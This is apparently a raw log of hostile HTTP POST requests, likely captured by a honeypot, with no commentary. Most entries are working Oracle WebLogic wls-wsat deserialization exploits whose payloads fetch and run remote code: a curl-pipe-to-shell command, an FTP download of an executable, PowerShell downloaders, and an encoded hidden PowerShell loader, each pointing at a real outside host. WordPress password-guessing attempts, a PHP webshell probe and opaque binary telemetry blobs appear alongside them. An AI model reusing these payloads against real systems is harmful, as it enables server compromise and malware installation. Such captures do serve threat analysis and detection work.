Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.3; .NET4.0E)
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

QqVZyN/AZhaJekUG48RFUJFCpqNZRKfQyAK90WUPoNj//xylB2frGe0eQGHn04NXVu0+G3sJZcQc4wd9HBduHF7V4YIojTBo2xqOHerSiIdVy72WGPrDklgg0Wuy7UaKHNNX1XRSm7xACTeUdaZhR+0n/9htK1aKwf3VpQ64Juf0ejBDJTr69Nf04H/4t8lDkGsJjAnk0q01VBXgDNSxTeJWsGR4MlfaT1bWgNyu+tPH0PU7p1z8OTOFfTKQqscqZXn/jgYZqQ3h0DhBqEvLKJiB+DvQjp+Wa4TM2lC/9EQdqbxuNXHxAf3CxwXXB6QhuFk60TlARLLqnuUbC6laQ3ysssLN2Ynl0Ktx88v+0mjzI5kFGEHBd0ahtjkjQF0gu3NrhxqtmD+mIF+aStV+Ibz581cLDO2276XX9g==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1300
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;@echo open 93.174.93.149&gt;sss.txt&amp;@echo binary&gt;&gt;sss.txt&amp;@echo get /taskhostxz.exe&gt;&gt;sss.txt&amp;@echo quit&gt;&gt;sss.txt&amp;@ftp -s:sss.txt -v -A&amp;@start taskhostxz.exe&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 400
Cache-Control: no-cache

F6BdlIjAZE68lYbPgzz2oFvsY+pWYk8wMa0CRJ4x2595gVOKqVTgKNZH8YwjbfzoL7BVjvrVw7CCAdLkAxapCm2crF9ehzKSy6BrVa3qFlX9LbLSOThkKDBHLHKAqEF3yjkBPuc+JUQqeVX7EcuxrVfddMsXPv3alxFgNGx6HC8EUuaPbQm3pPiCwp4BKJ3aSlqBl3xyzN0OKr8OpchPJa4ss7M1IUc7DQGxTFiwFlsYiS0Fu/U0Orj0yLO2dzyzjeNeDDNAgNuectspr/j+wXlQZqWjNpPQZkcUaOU9qvnvAyy8WKG5y1ZZse5KAzwWxcz3eUtnyVlqeX9MRfyHFH3/xLhIDsJ0yN2kXcwtNrJV2xdZA9L5/WTQHX86z6jq62Cn4oFdYJDdoW86

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
I™cÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îÊöY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

RK0IwY7BMoB6AVBRIzledVtTN7V5J9MO2gFquLWF2vuaDlQvbOY7QtaTltV01Edxy7HDHQavsicwzvWGLsEBSUv75o/HfqZv9cF9HJwoOMe2q6XwLOPy2rneWqQgFAMzhsdpC6uPeiXt98cFCLY3bwcSEWQIj6NiiQ5nl0zQgC+DvqaVDMQ8AwaBElacMSpAxACa4yC6lszHZwUrUA5awTrXdei1J8w8+jYD+f5xsWgP65kzk3IP2cY+8cGQmRFtlBk+iucoroULH7T18vAhbu20I1wk2oO27b/c1KYxwkwTkIjicigzB3nwOndP3vyogUU9e5mM6+j1l0vkbLNB+ZkzHzk4TGYOUglAu3/hCcx6bhKsyX1jzi0yeEE1BJtsQmPNlbe33NvQQbGJS9KZKg==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 22
Cache-Control: no-cache

log=admin&pwd=admin222

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 846
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/esentur.exe');start C:/Windows/temp/esentur.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1069
Content-Type: multipart/form-data; boundary=B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

720004
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

4714488b47edf2de59286c4fe288e0c4
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--B3B2OofjSrLx3RczxveUUmsOAkyMPonmeGF0Aq--


POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1075
Content-Type: multipart/form-data; boundary=lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

290379
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

e2e5d8f9259e0d10459ab23af8ea7e66
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--lYsI5Xr8vtCRjDOkveLsXyNlwGQJbom3NgNwvMS--


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 412
Cache-Control: no-cache

RqNako7OYswG80qiGFLJ1tOcbJt73MhFSKbUjGYNynwRkAi0ZwT/MKvptV1yx87mlkL8k++nQFYWDzHNXZIwm6zEXi+ovYF4ytaI0+Np5j/P45rqvWyHUmWJTFzDaBAg4V/kO8ekJrdy+Bz4mlRK1mZ0erFo6RXs1JT4Kb897KIhCtdI9sHuW8wIC49VpiZHk0TWo8dYn6+0yklNGuXaraq51u5O2xtSRcD8UTL/mKr7KZRUsT/x4QQwDHTcoK1uFZgRe9olUup47JwbawQuywCLz8meWTio1LpqAG+tLyff2IMhTvL5nMSX0C0Q20HYQcdToIdIrKZyidQEuA5W8NU3JuaNm/5Q8OBCZWBY5rJLL8YrX+Fg27Os6HKMTZK4TywSaBXxfJaTA37yfpNxL9kTp2qc

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=!@#$%^&

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1021
Content-Type: multipart/form-data; boundary=4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

520164
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

de38b380327f7bdacf15a9c1ceb52570
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--4DdTH8vyZQi7Z6oB1laRpkbUQMWpxU--


POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496226066453
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2388

1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959f§‰Ùíé<˛xúΩW€r£H˝áûv∑=n(@"Ê°$.ÉÏ*Z2.V
X‹°Çé˛˜Md∑≠fiÓôâ}ò
áRQ À…s2S_ª¬oÚó¡ÒTip
“Å<∑É 9
‰L∆cû◊ê¿èga6+‚PS&Tq¶y˛r)Ú·[∫õjÓoã:L«€º®27C€cVÊnxEvÁGœœA‰^PπTM’¡›!â™˙Æ®ˆw^·‰üÔº≤º√eâΩ::EuñÍ√@Ê≈…!i"Ú#^∏˝πOy0¯z˚îÎ?ÜE≥-ãCTGEæE[?H›vÀs‹ñó∏ø/>
q£€øtjë/ÉCÌVµy
™ø-∞?Fÿ˜ŒÆ√Ë!}Ïü¸
9Bh<æ˝#Ø}`ø˝˝v∞ˇüȯBÊ€±∑◊Èèôª|;‚∑@•ÉÍAÄÍ#so‡¸ïQˇXπ}°ÚD‰8˛œºπ!¸ø{˘ÖÔS˝z;◊ÔãÚeÏFi‡o´‡Û™u∏∏p=/8∂á„ÆnÀæø=~¬¿¥[ñIZHC◊
ƒqpœí‰˙‚ÿÖPDÙ¸rg?\Bc8™ÇCëÎ◊ì	‚˛≈s„^ؘ∂^·É"ıÉS‰€˙úàq#>XjüUî]ë√µ—€≠oTqsØ*‡NÊır‰‰ÒPˆÜÚd,?ÚÿáQVVQ^˜‘;Îd*L[ÁiYÓÏS,ï3-÷íx%—n—ô÷ ˛pØ'¢Q?È≥}√–:§Ò9÷<fMi<çâΩLY7O69UXO"“i)’
ÅfL0m"aú6Ï)}fiÈk‰ÿ
õ*⁄≥©xˆÊcÂrôXÇÈ0v≤uÊË*"∂—ùuõ‹Th‰(>ºú–¥g{Ç´"':÷ÍÏ(ÎOiπÀ)«ÏÛ·	içßMêÛ4Ô\{r‘±q6ßÓ}NGõ<Z{Ï^Òxf≠⁄˘1Q∞ƒ‚yHu"Rk!öX ô
÷ô@ÏuHt-6-Çgˇeyì_€˛¡rlHTYu$[àNºáòIK–<¶1
¡y ”6Df3¨Ûtì{˙§ıµ	d≤LΩ‹	w”˝‚±£≤Z1Ì°®≠Úé‚	àYkT!í£h‡¨uâuÎhì3§ûùLÖl‘„%ø≥”Düaâ(iÍ(pfi
¬MòMcf≠8f%<µ¶ã
dZ^ÀŒÔymÚÎÙ`%à &8
niFc«^¥¶æéY¶eÄÈôËÛî≈*û	”0X_
®Èt˜°ÆwQ
òÈ4sl'a;ÉEdÍ*PÜ4‘^àŒMe/“nfàÙØÍfiô6XŒ/ñÅ!;a›2¥bÿRÅLWd≤_…d%
”ëŒù8åÅ°"ç
Œ…úà*j„(Ü@,?d
79∆ì+2—ÇŸ“Ò¬◊’Ñsıu´ü=·púØœ˚Çv†{!PDSSaÌ‘¶áÖ(ZÃÏU≥…
àå@±‡’öJ¬9V“÷=]ìÄ™úéãñ(™`a˛¡2$Ì‘¢z~ºÔ≠ÉŒR'[Ç÷‘3|W⁄‰é≤LM éçÜX‡∑S9¢gí≠xÜ@∞ïHl^¨Î`”*}ß50˜¶∂UCï4°1ë(†lCbVö÷©húüô•ex:ΩÇg˙˙ösm¯´O…u*¢
⁄2„2ch?ç j3	ö«‚E-Zéóà
ö…Ê)È	fiK∆˜;Å>˚Ÿ∫ıPz⁄Ö{çŒDÓ!^¸\!Ó(ƒK28¬∫’òûä§Ä¶;
ÂÓ•%P¢c
Èxu~∞HMŒ†hk
»‡†®ÙûT˚1E–=,÷ãC TFªiJ≥VûÊÈ´¢õ:óLH†ÏáX˚¢ˆ—™hΩubÆBàǶItÍh˙ÜT–çcÁ≥˚¥‰ú'É·€”√}lŒzl˚LSP†ì–l
⁄f†w 7ÙMG_á¶Ç—°KX–îx”2f
∆ˇ∆PÓ2)ÖÆc*5P®ÑÿêƒO”Ùì≠⁄i19£è<ÃXÃŒ¿–ˇò±Ñÿ<<⁄K¿:µ≤jÄù£∞≥iØZ»tèß´Ù†≥i•Ùt8
}˜íYC˜6X^¨ÄºmØõfL›mq¯6€à±2.ÙÛ∂üÄYoa‡UUÙ≤SΩ›πΗÂÙ2√üèÈ’hflÏÆp´~€ èd<â/≥∏é<7›æÃ|˛}ª˘ÒŸıÍcuq˘πEıC’fl÷ïÎ%QæÔkcìY¶ùflÊ'◊^>ªˆÇ)ùC„˚	CîÃ1ïsB˜qÛ—oC†‹Ô±≤≥µXüj!Q
ËT%çBÍGaôëÆù©[\_◊=¥n][;Ëxfl∑Å3’Yc.ø∑©B[Ó°°zç{âÅjbi!ùqú©Ø@∏aH;\õñ3}—0ËGƒ⁄Z©LÑ{ƒªöaº.ùOËrø¬JN?í-“Ç(∫yÏ¿®Ñ¡√S(l≠ñ Î∆)±?üØ`Èì∂0∞æh•∞T`Äsø*"ˇuO:D˚‹ÌÅÖ'¢(K3YSeIîNç‰!ñ«öåÜ≤4ïgú,à≤†»h"èêÃO¡ÇW{ãKr›|™äæfiEuS߲ÊßQ˙O∏SBÅ‹˝˚™ÙÁ[uO?π‚“éªõfi®Ú{Á'÷7VUnÓ_s‰eìѧo>
ztqÃΙfl!
 ï7Ò˛.à|	>O∏I‡ÛºÄ‰˘` ïDw"I‹náÜ∞@{Ω„ËPˆøv^Ûõ¶Öó‹|:v]‹ÃÉÊ≤I˜)Ω.≤Ô_ë˚í’Ωµãü.K§óÂfiã∂R7fl
>¯ı%ÙB7œ/ã©Áf•’ÎÌ˛Í~oÔE®º(JÇ(¿VÃq‹◊Øˇ
GY‚d@f5e657d0651bfe30880eefe59951ccebc4a1dd8a10b67018628b9fe0479f0700 ea2a8140b82502408e8d8e7ae9a766c9

POST http://t17.proxy-checks.com/favicon.ico HTTP/1.1
Host: t17.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

Q/ALx9LKN2DC+2uam7wU3+i0hAlCl4hkQdrU2+fxsrZkNBzImwpBPUrcP+4+V+H00XhfY3b5dTTvBtVUSGnj0KxXmsPG1SF3wjHsQF1Qo6xMNnyLbLh3krlTjAcGYpXhOp+qX3kM83AmI/ziImbruN7pD61GENJfa0aIa3tngSpX3Zpgyk/KRRS8gCyeCdczWDTy6KRDILFpqVJX1mTYvoEu709soJYguAooKn+UvsJO5u4TwT+RyKdFh8IlLfbqdFAf5hHCXTsFw3uSQEZGZ4ZmTEzst02Nj4M9sM/2ZD/D3Z92maYAF+YAiy0JKVnRmZbTQiGCxHum9+NSCgw8RI6QPVVH5RrCTLKbu22umLSZgg9WHG9wVWS5fEVNlj6Rxqs18K9ffCRQafiNCfLEEWgG

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1063
Content-Type: multipart/form-data; boundary=4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

200826
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

34887ba2ef099f320cce713f2b4d523b
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--4g8afP6nVTIYlLZewNWFHNnp26805ILpCsMGE--


POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 20
Cache-Control: no-cache

log=172&pwd=asdf!@#$

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=172111

POST http://123.249.24.233/POST_ip_port.php HTTP/1.0
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

leng=die((string)(111111111*9));

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
